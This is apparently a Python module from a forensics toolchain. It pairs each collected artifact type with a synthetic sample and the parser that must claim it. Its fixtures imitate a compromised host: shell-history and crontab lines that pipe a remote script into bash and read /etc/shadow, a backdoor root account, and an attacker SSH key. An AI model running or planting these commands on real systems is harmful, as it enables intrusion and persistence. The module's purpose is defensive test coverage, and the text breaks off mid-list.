"""Collection→parsing bijection ledger: every artifact Talon collects, and the
Babel parser that must claim it.

``routing_coverage.py`` proves one direction — every parser Babel ships is
reachable by the router. That leaves the direction that actually loses evidence
unproven: *an artifact Talon collects with no parser to read it.* Such an
artifact does not error; it silently lands on the ``strings`` catch-all and the
whole structure of the record is gone. That is how ``mft/C_$MFT`` — the single
richest artifact in a bundle — got reduced to string extraction.

This module is the inventory half: one row per artifact shape Talon writes into
a bundle, keyed by the collection category it comes from (``ARTIFACT_LABELS`` in
tools/talon/collect.py), with the bundle-relative arcname, a synthetic sample
faithful enough to route (correct magic bytes / representative text), and the
parser that must claim it.

``collection_coverage.py`` drives it: it materialises every sample, runs the
real ``PluginLoader`` router over it, and fails on any drift.

Adding a collector to Talon means adding its rows here. A row whose parser does
not exist yet goes in with ``parser=None`` plus a ``gap`` reason — an explicit,
reviewable IOU, not a silent hole.
"""

from __future__ import annotations

import struct as _struct
from dataclasses import dataclass, field

# ── Sample builders ───────────────────────────────────────────────────────────
# Content-sniffing parsers (syslog, timestamped_log, apt_history, docker, …) read
# the file before claiming it, so an empty placeholder routes to nothing useful.
# Every sample below carries the real magic bytes or a representative record.

SQLITE = b"SQLite format 3\x00" + b"\x00" * 84
ESE = b"\x00" * 4 + b"\xef\xcd\xab\x89" + b"\x00" * 660  # JET/ESE DB header
REGF = b"regf" + b"\x00" * 4092
EVTX = b"ElfFile\x00" + b"\x00" * 4088
OLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504
ZIP = b"PK\x03\x04" + b"\x00" * 60
PE = b"MZ" + b"\x90\x00" * 30 + b"PE\x00\x00" + b"\x00" * 200
PDF = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\ntrailer\n%%EOF\n"
PCAP = b"\xd4\xc3\xb2\xa1\x02\x00\x04\x00" + b"\x00" * 16
PCAPNG = b"\x0a\x0d\x0d\x0a" + b"\x00" * 24
BPLIST = b"bplist00" + b"\x00" * 64
THUMBCACHE = b"CMMM" + b"\x14\x00\x00\x00" + b"\x00" * 64
KDBX = b"\x03\xd9\xa2\x9a\x67\xfb\x4b\xb5" + b"\x00" * 64
VHDX = b"vhdxfile" + b"\x00" * 512
PST = b"!BDN" + b"\x00" * 508
LOGFILE = b"RSTR" + b"\x00" * 4092  # NTFS $LogFile restart page
BOOT = b"\xeb\x52\x90NTFS    " + b"\x00" * 500
ETL = b"\xff\xff\xff\xff" + b"\x00" * 128  # ETW trace buffer header

XML_PLIST = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
    b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
    b'<plist version="1.0"><dict><key>Label</key><string>com.apple.x</string>'
    b"</dict></plist>\n"
)

TASK_XML = (
    b'<?xml version="1.0" encoding="UTF-16"?>\n'
    b'<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">\n'
    b"  <RegistrationInfo><Date>2026-01-15T10:00:00</Date>"
    b"<Author>SYSTEM</Author></RegistrationInfo>\n"
    b"  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>\n"
    b"  <Actions><Exec><Command>C:\\Windows\\System32\\cmd.exe</Command>"
    b"<Arguments>/c whoami</Arguments></Exec></Actions>\n"
    b"</Task>\n"
)

WLAN_XML = (
    b'<?xml version="1.0"?>\n'
    b'<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">\n'
    b"  <name>CorpWiFi</name>\n"
    b"  <SSIDConfig><SSID><name>CorpWiFi</name></SSID></SSIDConfig>\n"
    b"  <MSM><security><authEncryption><authentication>WPA2PSK</authentication>\n"
    b"  </authEncryption></security></MSM>\n"
    b"</WLANProfile>\n"
)

SYSLOG = (
    b"Jan 15 10:00:01 web01 sshd[1234]: Accepted publickey for root from 10.0.0.5 port 55terminal\n"
    b"Jan 15 10:00:02 web01 sudo:   jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; "
    b"COMMAND=/bin/bash\n"
    b"Jan 15 10:00:03 web01 kernel: [12345.678] audit: type=1400 apparmor=DENIED\n"
)

AUDITD = (
    b"type=SYSCALL msg=audit(1705312801.123:456): arch=c000003e syscall=59 success=yes "
    b'exit=0 a0=7ffd comm="bash" exe="/usr/bin/bash" key="exec"\n'
    b'type=EXECVE msg=audit(1705312801.123:456): argc=2 a0="/bin/sh" a1="-c"\n'
)

IPTABLES_LOG = (
    b"Jan 15 10:00:01 fw01 kernel: IPTABLES-DROP IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.1 "
    b"PROTO=TCP SPT=44321 DPT=22\n"
)

IPTABLES_RULES = (
    b"# Generated by iptables-save\n"
    b"*filter\n"
    b":INPUT ACCEPT [0:0]\n"
    b":FORWARD DROP [0:0]\n"
    b"-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT\n"
    b"-A INPUT -j DROP\n"
    b"COMMIT\n"
)

APT_HISTORY = (
    b"Start-Date: 2026-01-15  10:00:01\n"
    b"Commandline: apt-get install netcat\n"
    b"Requested-By: jdoe (1000)\n"
    b"Install: netcat-openbsd:amd64 (1.206-1)\n"
    b"End-Date: 2026-01-15  10:00:04\n"
)

ZEEK_CONN = (
    b"#separator \\x09\n"
    b"#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\n"
    b"#types\ttime\tstring\taddr\tport\taddr\tport\tenum\n"
    b"1705312801.123456\tCabc123\t10.0.0.5\t44321\t10.0.0.1\t22\ttcp\n"
)

SURICATA_EVE = (
    b'{"timestamp":"2026-01-15T10:00:01.123456+0000","event_type":"alert",'
    b'"src_ip":"10.0.0.5","dest_ip":"10.0.0.1","dest_port":22,'
    b'"alert":{"signature":"ET SCAN Potential SSH Scan","severity":2}}\n'
)

SHELL_HISTORY = b"whoami\nid\ncurl http://10.0.0.9/x.sh | bash\ncat /etc/shadow\n"

BASH_HISTORY_TS = b"#1705312801\nwhoami\n#1705312805\ncurl http://10.0.0.9/x.sh | bash\n"

ACCESS_LOG = (
    b'10.0.0.5 - - [15/Jan/2026:10:00:01 +0000] "GET /admin.php?id=1 HTTP/1.1" 200 1234 '
    b'"-" "sqlmap/1.7"\n'
    b'10.0.0.6 - - [15/Jan/2026:10:00:02 +0000] "POST /upload.aspx HTTP/1.1" 302 0 "-" "curl/8.0"\n'
)

IIS_LOG = (
    b"#Software: Microsoft Internet Information Services 10.0\n"
    b"#Fields: date time s-ip cs-method cs-uri-stem sc-status c-ip cs(User-Agent)\n"
    b"2026-01-15 10:00:01 10.0.0.1 GET /admin.aspx 200 10.0.0.5 curl/8.0\n"
)

TIMESTAMPED_LOG = (
    b"2026-01-15 10:00:01 INFO  Service starting, build 1.2.3\n"
    b"2026-01-15 10:00:02 WARN  Certificate expires in 3 days\n"
    b"2026-01-15 10:00:03 ERROR Connection to 10.0.0.9:4444 refused\n"
)

CBS_LOG = (
    b"2026-01-15 10:00:01, Info                  CBS    Loaded Servicing Stack v10.0\n"
    b"2026-01-15 10:00:02, Info                  CBS    Session: 3078 initialized\n"
)

DOCKER_JSON_LOG = (
    b'{"log":"starting app\\n","stream":"stdout","time":"2026-01-15T10:00:01.123456789Z"}\n'
    b'{"log":"connect 10.0.0.9:4444\\n","stream":"stderr",'
    b'"time":"2026-01-15T10:00:02.123456789Z"}\n'
)

DOCKER_INSPECT = (
    b'[{"Id":"abc123def456","Created":"2026-01-15T10:00:01.123456789Z",'
    b'"Name":"/web","State":{"Status":"running","Pid":4321,'
    b'"StartedAt":"2026-01-15T10:00:02.000000000Z"},'
    b'"Config":{"Image":"nginx:latest","Cmd":["nginx","-g","daemon off;"]}}]\n'
)

# macOS `log show` with no --style: the fixed-width column table Talon writes
# as the fallback when the JSON export is refused. Two preamble lines and a
# column header come first, exactly as the real tool emits them.
UNIFIED_LOG_TEXT = (
    b'Filtering the log data using "senderImagePath CONTAINS \'dnt\'"\n'
    b"Skipping info and debug messages, pass --info and/or --debug to include.\n"
    b"Timestamp                       Thread     Type        Activity             PID    TTL\n"
    b"2026-08-25 09:00:00.123456+0200 0x1a2b3    Default     0x0                  501    0    "
    b"mDNSResponder: [com.apple.mDNSResponder:dns] query A dntds.shop\n"
    b"2026-08-25 09:00:01.456789+0200 0x1a2b4    Error       0x1f2                812    0    "
    b"updater: (libnetwork.dylib) nw_connection failed\n"
)

# macOS system_triage.txt — the banner-delimited concatenation of ~18 command
# outputs that MacOSCollector._system_triage writes. Only a few sections are
# needed to prove routing and non-empty parsing; the plugin's own suite covers
# each section's format.
MACOS_TRIAGE = (
    b"\n" + b"=" * 60 + b"\nOS VERSION\n" + b"=" * 60 + b"\n"
    b"ProductName:\tmacOS\nProductVersion:\t14.4.1\nBuildVersion:\t23E224\n"
    b"\n" + b"=" * 60 + b"\nUNAME\n" + b"=" * 60 + b"\n"
    b"Darwin L20336 23.4.0 Darwin Kernel Version 23.4.0: Fri Mar  8 22:33:00 PST 2024; "
    b"root:xnu-10063.101.15~3/RELEASE_ARM64_T6020 arm64\n"
    b"\n" + b"=" * 60 + b"\nPROCESSES\n" + b"=" * 60 + b"\n"
    b"USER               PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND\n"
    b"tmoll              812   0.0  0.1  33812345   8192   ??  S     9:12AM   0:00.31 "
    b"/Users/tmoll/Library/Application Support/.dnt/updater --silent\n"
    b"\n" + b"=" * 60 + b"\nNETWORK SOCKETS\n" + b"=" * 60 + b"\n"
    b"Active Internet connections (including servers)\n"
    b"Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)\n"
    b"tcp4       0      0  192.168.1.10.52344     178.16.53.137.443      ESTABLISHED "
    b"131072 131072   812     0\n"
    b"\n" + b"=" * 60 + b"\nLAUNCH DAEMONS\n" + b"=" * 60 + b"\n"
    b"PID\tStatus\tLabel\n812\t0\tcom.dnt.updater\n"
)

# macOS LaunchServices quarantine store. A real SQLite file is required — the
# parser opens it — so it is built at import time rather than hard-coded.
def _quarantine_db() -> bytes:
    import sqlite3 as _sq3
    import tempfile as _tf
    from pathlib import Path as _P

    with _tf.TemporaryDirectory() as _td:
        _f = _P(_td) / "q.sqlite"
        _c = _sq3.connect(_f)
        _c.execute(
            "CREATE TABLE LSQuarantineEvent ("
            "LSQuarantineEventIdentifier TEXT PRIMARY KEY NOT NULL,"
            "LSQuarantineTimeStamp REAL,"
            "LSQuarantineAgentBundleIdentifier TEXT,"
            "LSQuarantineAgentName TEXT,"
            "LSQuarantineDataURLString TEXT,"
            "LSQuarantineSenderName TEXT,"
            "LSQuarantineSenderAddress TEXT,"
            "LSQuarantineTypeNumber INTEGER,"
            "LSQuarantineOriginTitle TEXT,"
            "LSQuarantineOriginURLString TEXT,"
            "LSQuarantineOriginAlias BLOB)"
        )
        _c.execute(
            "INSERT INTO LSQuarantineEvent VALUES (?,?,?,?,?,?,?,?,?,?,?)",
            (
                "F1A2-B3C4",
                807_699_120.0,  # Cocoa seconds → 2026-08-06T09:32:00Z
                "com.google.Chrome",
                "Google Chrome",
                "https://cdn.dntds.shop/setup.dmg",
                "",
                "",
                2,
                "Free Mac Cleaner",
                "https://dntds.shop/download",
                None,
            ),
        )
        _c.commit()
        _c.close()
        return _f.read_bytes()


QUARANTINE_DB = _quarantine_db()


# Desktop Safari's History.db. Same filename and schema as iOS Safari, so the
# router separates them by path — hence the full arcname on the row below.
def _safari_history_db() -> bytes:
    import sqlite3 as _sq3
    import tempfile as _tf
    from pathlib import Path as _P

    with _tf.TemporaryDirectory() as _td:
        _f = _P(_td) / "History.db"
        _c = _sq3.connect(_f)
        _c.execute(
            "CREATE TABLE history_items (id INTEGER PRIMARY KEY, url TEXT, visit_count INTEGER)"
        )
        _c.execute(
            "CREATE TABLE history_visits (id INTEGER PRIMARY KEY, history_item INTEGER, "
            "visit_time REAL, title TEXT, redirect_source INTEGER, redirect_destination INTEGER)"
        )
        _c.execute("INSERT INTO history_items VALUES (1,'https://dntds.shop/download',3)")
        _c.execute(
            "INSERT INTO history_visits VALUES (1,1,807698400.0,'Free Mac Cleaner',NULL,NULL)"
        )
        _c.commit()
        _c.close()
        return _f.read_bytes()


SAFARI_HISTORY_DB = _safari_history_db()

# macOS /var/log/install.log — ISO timestamp with a TWO-digit offset.
MACOS_INSTALL_LOG = (
    b"2026-08-25 09:00:00+02 L20336 softwareupdated[456]: Descriptor state: Downloaded\n"
    b"2026-08-25 09:12:31+02 L20336 installer[812]: PackageKit: Install Failed: "
    b"/Users/tmoll/Downloads/setup.pkg\n"
)

# macOS /var/log/wifi.log — association history, its own format.
MACOS_WIFI_LOG = (
    b"Mon Aug 25 09:00:00.000 <airportd[123]> _handleLinkEvent: en0 associated to CORP-WIFI\n"
    b"Mon Aug 25 09:30:12.451 <airportd[123]> _processSSIDList: scan complete\n"
)

UNIFIED_LOG_NDJSON = (
    b'{"timestamp":"2026-01-15 10:00:01.123456+0000","subsystem":"com.apple.securityd",'
    b'"eventMessage":"authorization granted","processImagePath":"/usr/sbin/securityd"}\n'
)

CLOUD_TRAIL = (
    b'{"Records":[{"eventTime":"2026-01-15T10:00:01Z","eventSource":"iam.amazonaws.com",'
    b'"eventName":"CreateAccessKey","sourceIPAddress":"10.0.0.5",'
    b'"userIdentity":{"type":"IAMUser","userName":"jdoe"}}]}\n'
)

# Two real WER shapes. Archived reports are INI-like key=value (.wer); queued
# reports are XML named WER.<guid>.tmp.xml. Both are collected verbatim from
# ReportQueue/ReportArchive, and the XML one is what a real bundle mostly holds.
WER_REPORT = (
    b"Version=1\r\n"
    b"EventType=APPCRASH\r\n"
    b"EventTime=133500000000000000\r\n"
    b"AppName=svchost.exe\r\n"
    b"AppPath=C:\\Windows\\System32\\svchost.exe\r\n"
    b"Sig[0].Name=Application Name\r\n"
    b"Sig[0].Value=svchost.exe\r\n"
)

WER_REPORT_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b"<WERReportMetadata>\n"
    b"  <WERSystemMetadata><MachineName>WIN01</MachineName>"
    b"<OSVersion>10.0.19045</OSVersion></WERSystemMetadata>\n"
    b"  <WERProcessInformation><AppName>svchost.exe</AppName>"
    b"<AppPath>C:\\Windows\\System32\\svchost.exe</AppPath>"
    b"<ProcessId>4321</ProcessId></WERProcessInformation>\n"
    b"  <WERReportInformation><EventName>APPCRASH</EventName>"
    b"<FriendlyEventName>Stopped responding and was closed</FriendlyEventName>"
    b"<EventTime>133500000000000000</EventTime>"
    b"<ReportIdentifier>5381ec19-85a9-48cf-9e64-4355dc75239a</ReportIdentifier>"
    b"</WERReportInformation>\n"
    b"</WERReportMetadata>\n"
)

NETSTAT = (
    b"Active Internet connections (servers and established)\n"
    b"Proto Recv-Q Send-Q Local Address           Foreign Address         State\n"
    b"tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN\n"
    b"tcp        0      0 10.0.0.5:44321          10.0.0.9:4444           ESTABLISHED\n"
)

LINUX_PASSWD = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    b"jdoe:x:1000:1000:John Doe:/home/jdoe:/bin/bash\n"
    b"backdoor:x:0:0::/root:/bin/bash\n"
)

CRONTAB = (
    b"# m h dom mon dow command\n"
    b"*/5 * * * * root curl -s http://10.0.0.9/x.sh | bash\n"
    b"0 3 * * * root /usr/bin/backup.sh\n"
)

SSH_AUTHORIZED_KEYS = (
    b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abc attacker@kali\n"
)

OVPN = (
    b"client\ndev tun\nproto udp\nremote vpn.corp.example 1194\ncipher AES-256-GCM\nauth SHA256\n"
)

TREND_TELEMETRY = (
    b'{"eventSourceType":1,"eventSubId":101,"endpointGuid":"ABC-123","endpointHostName":"WIN01",'
    b'"processHashId":"deadbeef","productCode":"sao","logonUser":"jdoe",'
    b'"objectFilePath":"C:\\\\Users\\\\jdoe\\\\Downloads\\\\x.exe",'
    b'"eventTime":1768471201000,"malName":"TROJ_GEN.R002"}\n'
)

MDATP_THREATS = (
    b"2026-01-15 10:00:01 Threat detected: Trojan:Win32/Emotet\n"
    b"2026-01-15 10:00:01   file: /home/jdoe/x.elf\n"
    b"2026-01-15 10:00:02 Threat quarantined: Trojan:Win32/Emotet\n"
)

MARKOFWEB = b"[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://evil.example/dl\r\n"

# A PEM certificate, as shipped inside a vendor's antivirus/ directory.
PEM_CERT = (
    b"-----BEGIN CERTIFICATE-----\n"
    b"MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwIjANBgkqhkiG9w0BAQUFADBl\n"
    b"IgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwHhcNMDYxMTEwMDAw\n"
    b"-----END CERTIFICATE-----\n"
)

K8S_YAML = (
    b"apiVersion: v1\nkind: Pod\nmetadata:\n  name: web\n  namespace: default\n"
    b"spec:\n  containers:\n  - name: nginx\n    image: nginx:latest\n"
)

COMPOSE_YAML = (
    b'version: "3"\nservices:\n  web:\n    image: nginx:latest\n    ports:\n      - "80:80"\n'
)

GITCONFIG = (
    b"[user]\n\tname = John Doe\n\temail = jdoe@corp.example\n"
    b'[remote "origin"]\n\turl = https://github.com/corp/app.git\n'
)

VDF = b'"users"\n{\n\t"76561198000000000"\n\t{\n\t\t"AccountName"\t\t"jdoe"\n\t}\n}\n'

RECYCLE_I = (
    b"\x02\x00\x00\x00\x00\x00\x00\x00"  # version 2
    b"\x00\x10\x00\x00\x00\x00\x00\x00"  # size
    b"\x80\x9a\x1c\x00\x00\x00\x00\x00"  # deletion FILETIME
    b"\x1a\x00\x00\x00" + "C:\\Users\\jdoe\\secret.docx\x00".encode("utf-16-le")  # name length
)

# One real USER_PROCESS record each, packed from the layouts the parsers use
# (utmp_plugin._UTMP_FMT / lastlog_plugin._RECORD). A zero-filled record of the
# right length is *correctly* skipped as filler, so it proves nothing.
UTMP = _struct.pack(
    "<hxxi32s4s32s256shhiii16s20s",
    7,  # ut_type USER_PROCESS
    1234,  # ut_pid
    b"pts/0",  # ut_line
    b"ts/0",  # ut_id
    b"root",  # ut_user
    b"10.0.0.9",  # ut_host
    0,
    0,
    0,  # term, exit, session
    1768471201,  # tv_sec
    0,  # tv_usec
    _struct.pack("<4I", 0x0900000A, 0, 0, 0),  # ut_addr_v6
    b"",
)
LASTLOG = _struct.pack("<i32s256s", 1768471201, b"pts/0", b"10.0.0.9")


@dataclass(frozen=True)
class Artifact:
    """One artifact shape Talon writes into a bundle.

    category  Talon collection key (ARTIFACT_LABELS in tools/talon/collect.py)
    path      bundle-relative arcname, verbatim from the collector
    sample    bytes faithful enough for a content-sniffing parser to claim
    parser    Babel PLUGIN_NAME that must claim it; None = declared open gap
    gap       why no dedicated parser exists yet (required when parser is None)
    mime      MIME the ingest stage would detect, when it affects routing
    empty_ok  why 0 events is the correct result for this sample (see below)
    """

    category: str
    path: str
    sample: bytes
    parser: str | None
    gap: str = ""
    mime: str = "application/octet-stream"
    empty_ok: str = ""
    tags: tuple[str, ...] = field(default=())


def _a(
    category,
    path,
    sample,
    parser,
    *,
    gap="",
    mime="application/octet-stream",
    empty_ok="",
    tags=(),
):
    return Artifact(category, path, sample, parser, gap, mime, empty_ok, tuple(tags))


# ─────────────────────────────────────────────────────────────────────────────
# The ledger
# ─────────────────────────────────────────────────────────────────────────────
# Ordered by collection category so it reads alongside Talon's ARTIFACT_LABELS.

ARTIFACTS: list[Artifact] = [
    # ══ Windows — live ═══════════════════════════════════════════════════════
    _a("evtx", "evtx/Security.evtx", EVTX, "evtx"),
    _a("evtx", "evtx/Microsoft-Windows-Sysmon%4Operational.evtx", EVTX, "evtx"),
    _a("registry", "registry/SYSTEM", REGF, "registry"),
    _a("registry", "registry/users/jdoe/NTUSER.DAT", REGF, "registry"),
    _a("registry", "registry/RegBack/SOFTWARE", REGF, "registry"),
    _a(
        "registry",
        "registry/logs/SYSTEM.LOG1",
        b"regf" + b"\x00" * 508,
        None,
        gap="registry transaction logs hold unflushed keys a hive dump misses; "
        "needs a replay parser (dissect.regf supports it)",
    ),
    _a(
        "prefetch",
        "prefetch/CMD.EXE-4A81B364.pf",
        b"\x1a\x00\x00\x00SCCA" + b"\x00" * 500,
        "prefetch",
    ),
    _a("lnk", "lnk/jdoe/report.lnk", b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 500, "lnk"),
    _a("browser", "browser/chrome/jdoe/Default/History", SQLITE, "browser"),
    _a("browser", "browser/firefox/jdoe/x.default/places.sqlite", SQLITE, "browser"),
    # macOS LSQuarantine: every downloaded file with the URL it came from AND
    # the page that referred to it — the cleanest download-provenance artifact
    # on macOS. Was an open gap routing to `strings`; the browser parser now
    # claims it by name and reads LSQuarantineEvent.
    _a(
        "browser",
        "browser/jdoe/quarantine_events.sqlite",
        QUARANTINE_DB,
        "browser",
        mime="application/vnd.sqlite3",
    ),
    _a("tasks", "scheduled_tasks/Microsoft/Windows/UpdateOrchestrator", TASK_XML, "scheduled_task"),
    _a("mft", "mft/C_$MFT", b"FILE0\x00\x03\x00" + b"\x00" * 1017, "mft"),
    _a("mft", "mft/D_$MFT", b"FILE0\x00\x03\x00" + b"\x00" * 1017, "mft"),
    _a(
        "pe",
        "pe/System32/svchost.exe",
        PE,
        None,
        gap="PE metadata (compile stamp, sections, imports, signature) is only "
        "reachable via the Anvil pe_analysis module; no timeline parser",
    ),
    _a(
        "documents",
        "documents/jdoe/Desktop/invoice.docx",
        ZIP,
        None,
        gap="OOXML/PDF authorship + revision metadata has no parser; "
        "Anvil oletools/exiftool cover it as on-demand analysis only",
    ),
    _a("documents", "documents/jdoe/Desktop/report.pdf", PDF, None, gap="see documents/*.docx"),
    _a("downloads", "downloads/jdoe/setup.exe", PE, None, gap="see pe/"),
    _a(
        "jumplists",
        "jumplists/jdoe/AutomaticDestinations/1b4dd67f29cb1962.automaticDestinations-ms",
        OLE,
        "jumplist",
    ),
    _a(
        "thumbcache",
        "thumbcache/jdoe/thumbcache_256.db",
        THUMBCACHE,
        None,
        gap="thumbcache CMMM entries prove a file was rendered after deletion; no parser",
    ),
    _a(
        "timeline_activity",
        "timeline/jdoe/ActivitiesCache.db",
        SQLITE,
        "win_timeline",
        empty_ok="a bare SQLite header has no Activity table; reproducing the real "
        "schema belongs in the win_timeline parser's own golden test",
    ),
    _a(
        "timeline_activity",
        "timeline/jdoe/wpndatabase.db",
        SQLITE,
        "notifications",
        empty_ok="a bare SQLite header has no Notification table; see ActivitiesCache.db",
    ),
    _a(
        "windows_search",
        "search/Windows.edb",
        ESE,
        None,
        gap="ESE search index carries indexed file paths and Outlook message "
        "bodies; needs a shared ESE reader",
    ),
    _a("recyclebin", "recyclebin/S-1-5-21-1000/$IA3RTOF.docx", RECYCLE_I, "recyclebin"),
    _a("triage", "triage/systeminfo.txt", TIMESTAMPED_LOG, "windows_triage"),
    # windows_triage owns netstat.txt/pfirewall.log/IIS u_ex*.log itself (it has
    # dedicated handlers for all three), so it — not the shape-generic netstat or
    # access_log parser — is the correct claimant inside a Windows bundle.
    _a("triage", "triage/netstat.txt", NETSTAT, "windows_triage"),
    # ══ Windows — dead-box / harvest ═════════════════════════════════════════
    _a("execution", "execution/Amcache.hve", REGF, "registry"),
    _a(
        "execution",
        "execution/SRUDB.dat",
        ESE,
        None,
        gap="SRUM is the per-app network/energy usage history — often the only "
        "record of exfil volume; needs the shared ESE reader",
    ),
    _a(
        "execution",
        "execution/prefetch/CMD.EXE-4A81B364.pf",
        b"\x1a\x00\x00\x00SCCA" + b"\x00" * 500,
        "prefetch",
    ),
    _a("persistence", "persistence/tasks/Windows/Evil", TASK_XML, "scheduled_task"),
    _a(
        "persistence",
        "persistence/wmi/OBJECTS.DATA",
        b"\xff\xff" + b"\x00" * 8190,
        None,
        gap="WMI repository holds EventConsumer persistence; needs a CIM-repository parser",
    ),
    _a(
        "network_cfg",
        "network_cfg/hosts",
        b"127.0.0.1 localhost\n10.0.0.9 update.microsoft.com\n",
        "linux_config",
    ),
    _a(
        "network_cfg",
        "network_cfg/pfirewall.log",
        b"#Version: 1.5\n"
        b"#Fields: date time action protocol src-ip dst-ip src-port dst-port size "
        b"tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path\n"
        b"2026-01-15 10:00:01 DROP TCP 10.0.0.9 10.0.0.5 44321 4444 52 S 0 0 8192 - - - "
        b"RECEIVE\n",
        "windows_triage",
    ),
    _a("network_cfg", "network_cfg/wlan/Interfaces/CorpWiFi.xml", WLAN_XML, "wlan_profile"),
    _a(
        "usb_devices",
        "usb_devices/setupapi.dev.log",
        b">>>  [Device Install (Hardware initiated) - USBSTOR\\Disk&Ven_SanDisk]\n"
        b">>>  Section start 2026/01/15 10:00:01.123\n",
        "syslog",
    ),
    _a("credentials", "credentials/SECURITY", REGF, "registry"),
    _a(
        "credentials",
        "credentials/jdoe/Credentials/DFBE70A7E5CC19A3",
        b"\x01\x00\x00\x00" + b"\x00" * 300,
        None,
        gap="DPAPI master keys / Credential Manager blobs are opaque without "
        "the user's key; only inventory events are feasible",
    ),
    _a("antivirus", "antivirus/mdatp/mdatp_threats.txt", MDATP_THREATS, "syslog"),
    _a("antivirus", "antivirus/defender/MPLOG.LOG", MDATP_THREATS, "antivirus"),
    # Talon copies the vendor directory wholesale, so it holds certificates,
    # drivers and signature stores next to the logs. These must NOT reach the
    # antivirus parser: it emits one event per line, so a root CA became
    # "[trendmicro] DigiCert Assured ID Root CA" plus its base64 body.
    _a(
        "antivirus",
        "antivirus/trend/response_ca.cert",
        PEM_CERT,
        None,
        gap="a vendor/root certificate is real evidence (a rogue root CA is a "
        "MITM indicator) but there is no certificate parser; strings is the "
        "correct floor until one exists",
    ),
    _a(
        "antivirus",
        "antivirus/defender/DetectionHistory/01/ABC123",
        b"\x08\x00\x00\x00Magic.Version:1.2" + b"\x00" * 200,
        None,
        gap="Defender DetectionHistory is an undocumented TLV blob naming the "
        "threat, path and action; needs a dedicated parser",
    ),
    _a(
        "antivirus",
        "antivirus/trend/telemetry.json",
        TREND_TELEMETRY,
        "trend_telemetry",
        mime="application/json",
    ),
    _a("sysmon", "sysmon/Microsoft-Windows-Sysmon%4Operational.evtx", EVTX, "evtx"),
    _a(
        "sysmon",
        "sysmon/config/sysmon.xml",
        b'<Sysmon schemaversion="4.90"><EventFiltering>'
        b'<ProcessCreate onmatch="exclude"/></EventFiltering></Sysmon>\n',
        "json_file",
    ),
    _a("sysmon", "sysmon/sysmon_events.log", TIMESTAMPED_LOG, "timestamped_log"),
    _a("file_search", "file_search/Users/jdoe/note.txt", TIMESTAMPED_LOG, "timestamped_log"),
    _a("wer_crashes", "wer_crashes/ReportArchive/Report.wer", WER_REPORT, "wer"),
    # The shape Windows actually queues, and the one seen in a real bundle: an
    # XML report, not a .wer file. The ledger originally had only the .wer row,
    # which is why the checker did not catch this landing on the plist parser.
    _a(
        "wer_crashes",
        "wer_crashes/ReportQueue/WER.5381ec19-85a9-48cf-9e64-4355dc75239a.tmp.xml",
        WER_REPORT_XML,
        "wer",
    ),
    _a(
        "wer_crashes",
        "wer_crashes/ReportQueue/Report.wer",
        WER_REPORT,
        "wer",
    ),
    _a("filesystem", "filesystem/$MFT", b"FILE0\x00\x03\x00" + b"\x00" * 1017, "mft"),
    _a(
        "filesystem",
        "filesystem/$LogFile",
        LOGFILE,
        None,
        gap="$LogFile records transactions the MFT already overwrote — the only "
        "source for very-recent deletes; needs a parser",
    ),
    _a(
        "filesystem",
        "filesystem/$Boot",
        BOOT,
        None,
        gap="$Boot yields volume geometry/serial for cross-image correlation; "
        "low event value, inventory only",
    ),
    # Dead-box collection files each browser separately (live collection uses the
    # single "browser" category), so each per-browser category needs its own rows.
    _a("browser_chrome", "browser_chrome/jdoe/History", SQLITE, "browser"),
    _a("browser_chrome", "browser_chrome/jdoe/Cookies", SQLITE, "browser"),
    _a("browser_chrome", "browser_chrome/jdoe/Login Data", SQLITE, "browser"),
    _a("browser_chrome", "browser_chrome/jdoe/Web Data", SQLITE, "browser"),
    _a(
        "browser_chrome",
        "browser_chrome/jdoe/Bookmarks",
        b'{"roots":{"bookmark_bar":{"children":[{"name":"evil","url":"http://10.0.0.9/"}]}}}\n',
        "browser",
    ),
    _a("browser_edge", "browser_edge/jdoe/History", SQLITE, "browser"),
    _a("browser_edge", "browser_edge/jdoe/Cookies", SQLITE, "browser"),
    _a("browser_edge", "browser_edge/jdoe/Login Data", SQLITE, "browser"),
    _a("browser_firefox", "browser/firefox/jdoe/x.default/cookies.sqlite", SQLITE, "browser"),
    _a("browser_firefox", "browser/firefox/jdoe/x.default/formhistory.sqlite", SQLITE, "browser"),
    _a("browser_firefox", "browser/firefox/jdoe/x.default/key4.db", SQLITE, "browser"),
    _a(
        "browser_ie",
        "browser_ie/jdoe/WebCacheV01.dat",
        ESE,
        None,
        gap="IE/Edge WebCache (ESE) holds history, cookies and download records; "
        "needs the shared ESE reader",
    ),
    _a(
        "email_outlook",
        "email_outlook/jdoe/archive.pst",
        PST,
        None,
        gap="PST/OST mail stores are central to phishing and BEC cases and have "
        "no parser; libpff/pypff would cover both",
    ),
    _a("email_outlook", "email_outlook/jdoe/mailbox.ost", PST, None, gap="see archive.pst"),
    _a(
        "email_thunderbird",
        "email_thunderbird/jdoe/x.default/global-messages-db.sqlite",
        SQLITE,
        None,
        gap="Thunderbird gloda index maps messages to senders and "
        "attachments; needs a SQLite parser",
    ),
